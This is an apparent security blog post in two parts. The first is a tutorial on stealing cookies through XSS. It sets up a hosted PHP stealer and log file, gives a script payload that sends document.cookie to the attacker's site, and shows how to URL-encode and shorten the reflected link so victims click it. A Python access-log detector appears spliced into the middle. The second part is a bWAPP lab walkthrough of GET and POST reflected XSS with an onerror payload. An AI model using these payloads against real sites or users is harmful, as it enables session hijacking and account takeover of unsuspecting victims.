Cookie Stealing From Cross Site Scripting (XSS) Attack


Hello guys, in this post I will show you cookie stealing through a cross-site scripting (XSS) attack, that is, how an attacker can steal cookies from users. I hope you are familiar with XSS; if not, please read our basic XSS tutorial.

Prerequisites:

  • A Cookie Stealer Code : Get It From Here
  • A Free Web Hosting.
  • Basic Knowledge About XSS Attack.

Cookie stealing is the process in which an attacker exploits an XSS vulnerability to steal the cookies of a victim who visits the infected link. These cookies are then used to compromise the victim's account.

Creating a PHP Cookie Stealer

  • Copy the cookie stealer code from here.
  • Open Notepad or any editor and paste the code.
  • Save the file with a .php extension, e.g. xss.php

Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name given in the PHP file.
Now we have two files:
  1) xss.php
  2) log.txt

Hosting the Cookie Stealer and Log File

Now we have to host both files. For hosting, you can use free web hosting or secure tunnelling. After hosting, the stealer will be at: www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting (XSS) Attack

Now that everything is set up, we have to find a vulnerable website into which to inject our malicious code.

<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if this code is injected into a site vulnerable to persistent XSS, it stays there until an admin finds it. It is shown to all users, so the attacker doesn't need to send any link to others. Whoever visits the page becomes a victim.

Reflected: in the case of a non-persistent attack, the attacker sends the link to victims. Whenever they follow the link, it steals the cookie. Most sites are vulnerable to reflected XSS.

In the reflected case, the attacker sends the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>

The above link clearly shows the script. An attacker can URL-encode this script, shorten the link with a URL shortening service like TinyURL, and then send it to the victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim opens the link, his/her cookie will be stored in the log.txt file.
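Because the encoded link above still carries the script in a query parameter, a defender can decode request URLs from access logs and flag them; this Python sketch is an added example, not code from the original post. The marker list, the function names and the shop.example and collector.example hosts are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Markers taken from the links in this post: script tags, inline event
# handlers (onerror=...), and reads of document.cookie.
MARKERS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "cookie-read": re.compile(r"document\s*\.\s*cookie", re.I),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(url):
    """Return [(parameter, [marker names])] for suspicious query parameters."""
    findings = []
    # parse_qsl already decodes once; fully_decode handles extra layers.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = fully_decode(value)
        hits = [label for label, rx in MARKERS.items() if rx.search(text)]
        if hits:
            findings.append((name, hits))
    return findings

# Constructed sample requests (hosts are placeholders, not from the post).
SCRIPT = ("<script>location.href = 'http://collector.example/xss.php"
          "?cookie='+document.cookie;</script>")
BASE = "http://shop.example/index.php?search="
SAMPLES = {
    "plain": BASE + SCRIPT,
    "encoded": BASE + quote(SCRIPT, safe=""),
    "double-encoded": BASE + quote(quote(SCRIPT, safe=""), safe=""),
    "benign": BASE + "cookie+recipes&page=2",
}

if __name__ == "__main__":
    for label, url in SAMPLES.items():
        print(f"{label:15} {flag_request(url)}")
```

Setting session cookies with the HttpOnly attribute keeps them out of document.cookie, so a script like the one above cannot read them.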

 

Cross site scripting (XSS) Vulnerability


Hello guys, welcome to Infosec Zone. Today I am going to show you the cross-site scripting vulnerability, which is one of the most dangerous vulnerabilities and is listed in the OWASP Top 10. Read carefully, try it, and practice. In this tutorial we will cover reflected cross-site scripting with the GET method and the POST method.

What is cross site scripting (XSS)?

XSS is a type of attack in which an attacker injects a malicious script into a website. XSS occurs when an attacker uses a web application to send malicious code, in the form of a browser-side script, to different end users.

The malicious script can access cookies, session tokens, or other sensitive information. It is caused by insufficient input validation on the server side as well as the client side.

There are two basic types of XSS:

  • Reflected cross site scripting XSS Attack (Non-Persistent)
  • Stored cross site scripting XSS Attack (Persistent)

Read more about them on the official OWASP website.

So let's start the practical…

Here I am using bWAPP on my localhost; you can use this or DVWA. But I think that bWAPP is much better than DVWA.

In this practical we use this payload:

<img src=lol.png onerror=prompt(document.domain) />

First, select the XSS vulnerability to attack and start.


Just paste this payload into the first name and last name fields and click Go. As a result, you can see that our code is executed and we get a popup.

Great, we have successfully XSSed… 🙂

The above XSS used the GET method. Let's start the POST method. For the POST method, the requirement is the HackBar add-on in Firefox. Install it if you don't have it and follow me step by step.

Just click on Post data in HackBar, type anything in both fields, and load the URL. You will see something like this.


In the post data, add the payload. See the image below and execute.


Yeah, our code is executed… Keep learning 🙂 and share it.